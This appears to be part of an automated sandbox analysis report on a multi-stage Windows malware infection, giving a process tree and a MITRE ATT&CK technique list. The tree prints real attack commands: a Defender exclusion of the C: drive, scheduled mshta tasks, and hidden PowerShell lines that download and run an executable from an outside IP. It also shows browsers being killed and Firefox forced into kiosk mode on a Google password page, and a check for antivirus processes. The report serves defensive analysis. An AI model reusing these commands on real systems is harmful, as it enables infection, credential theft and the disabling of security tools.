    "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:4308
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:232
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4056
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:2820
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5044
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8184
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:448
      - C:\Users\Admin\AppData\Local\Temp\{ec129f46-a689-4fd0-97ef-7944e6e4cf22}\13d55a37.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{ec129f46-a689-4fd0-97ef-7944e6e4cf22}\13d55a37.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        6⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:11668
        
        C:\Users\Admin\AppData\Local\Temp\{6213b097-d4fe-4085-9389-2a17a60da1b4}\0047102a.exe
        
        C:/Users/Admin/AppData/Local/Temp/{6213b097-d4fe-4085-9389-2a17a60da1b4}/\0047102a.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:12524
- - C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4688
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:3104
- - C:\Users\Admin\AppData\Local\Temp\10338040101\d3d6a21859.exe
    "C:\Users\Admin\AppData\Local\Temp\10338040101\d3d6a21859.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn ESb1UmahFJN /tr "mshta C:\Users\Admin\AppData\Local\Temp\OBtXgpMUA.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2120
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn ESb1UmahFJN /tr "mshta C:\Users\Admin\AppData\Local\Temp\OBtXgpMUA.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:7200
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\OBtXgpMUA.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:2992
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7332
      - C:\Users\Admin\AppData\Local\TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
        
        "C:\Users\Admin\AppData\Local\TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:8364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10338050121\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8052
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:8676
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:9032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:9068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5244
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5376
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "J2LqImaySJY" /tr "mshta \"C:\Temp\nfrE5CvFH.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:9452
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\nfrE5CvFH.hta"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:9484
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:9608
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:10384
- - C:\Users\Admin\AppData\Local\Temp\10338160101\73ed0fd0bf.exe
    "C:\Users\Admin\AppData\Local\Temp\10338160101\73ed0fd0bf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:10056
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:10188
- - C:\Users\Admin\AppData\Local\Temp\10338170101\5d92038cff.exe
    "C:\Users\Admin\AppData\Local\Temp\10338170101\5d92038cff.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:10864
- - C:\Users\Admin\AppData\Local\Temp\10338190101\2dadc4a98b.exe
    "C:\Users\Admin\AppData\Local\Temp\10338190101\2dadc4a98b.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:11588
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:11676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:12768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6236
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:13024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:13128
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:2008
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Drops desktop.ini file(s)
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:13236
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2004 -prefsLen 27099 -prefMapHandle 2008 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {f35484e2-0e72-4359-8696-655772c040c5} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:6660
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {b6bebdf2-a3ee-4b72-a303-c69fdc69eaf1} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:6544
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3876 -prefsLen 25164 -prefMapHandle 3880 -prefMapSize 270279 -jsInitHandle 3884 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3896 -initialChannelId {29c8811e-30ee-4edf-8d90-eef35e073329} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        Checks processor information in registry
        
        PID:7052
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4084 -prefsLen 27276 -prefMapHandle 4088 -prefMapSize 270279 -ipcHandle 4124 -initialChannelId {2e32130c-ca50-4eb2-b413-c91c3d64a347} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:7136
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4384 -prefsLen 34775 -prefMapHandle 4388 -prefMapSize 270279 -jsInitHandle 4392 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4400 -initialChannelId {e69c489a-f451-4661-bb82-aab782a60b7f} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        Checks processor information in registry
        
        PID:4088
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4968 -prefsLen 35012 -prefMapHandle 4964 -prefMapSize 270279 -ipcHandle 4960 -initialChannelId {dcd8da36-4360-4d96-b395-6c5ec1167563} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        Checks processor information in registry
        
        PID:9172
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5196 -prefsLen 32952 -prefMapHandle 5200 -prefMapSize 270279 -jsInitHandle 5204 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5216 -initialChannelId {752780be-c4ac-49af-b80c-416d861476a5} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        Checks processor information in registry
        
        PID:9204
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5412 -prefsLen 32952 -prefMapHandle 5416 -prefMapSize 270279 -jsInitHandle 5420 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5336 -initialChannelId {8d265427-bce4-4b68-89ff-5628db2d5702} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        Checks processor information in registry
        
        PID:9360
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5636 -prefsLen 32952 -prefMapHandle 5640 -prefMapSize 270279 -jsInitHandle 5644 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5412 -initialChannelId {3e97eb13-ab69-4c1b-8334-9eb14e85ddea} -parentPid 13236 -crashReporter "\\.\pipe\gecko-crash-server-pipe.13236" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        Checks processor information in registry
        
        PID:4236
- - C:\Users\Admin\AppData\Local\Temp\10338200101\8c1aa1e31d.exe
    "C:\Users\Admin\AppData\Local\Temp\10338200101\8c1aa1e31d.exe"
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    - Modifies Windows Defender Real-time Protection settings
    - Modifies Windows Defender TamperProtection settings
    - Modifies Windows Defender notification settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:9680
- - C:\Users\Admin\AppData\Local\Temp\10338210101\f73ae_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10338210101\f73ae_003.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:12528
- - C:\Users\Admin\AppData\Local\Temp\10338220101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10338220101\7IIl2eE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:13148
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:1016
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:9420
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4024
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:9832
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9484
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7784
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9956
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4732
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9716
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:9700
    - - C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:10476
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2848
- - C:\Users\Admin\AppData\Local\Temp\10338230101\5fa1f2042d.exe
    "C:\Users\Admin\AppData\Local\Temp\10338230101\5fa1f2042d.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:10896
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10338230101\5fa1f2042d.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:11376
- - C:\Users\Admin\AppData\Local\Temp\10338240101\d22ac8d9aa.exe
    "C:\Users\Admin\AppData\Local\Temp\10338240101\d22ac8d9aa.exe"
    3⤵
    PID:7636
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10338240101\d22ac8d9aa.exe"
      4⤵
      PID:13248
- - C:\Users\Admin\AppData\Local\Temp\10338250101\13ee50ea72.exe
    "C:\Users\Admin\AppData\Local\Temp\10338250101\13ee50ea72.exe"
    3⤵
    PID:9168
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:8064

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6344

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify Tools

Safe Mode Boot

T1562.009

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion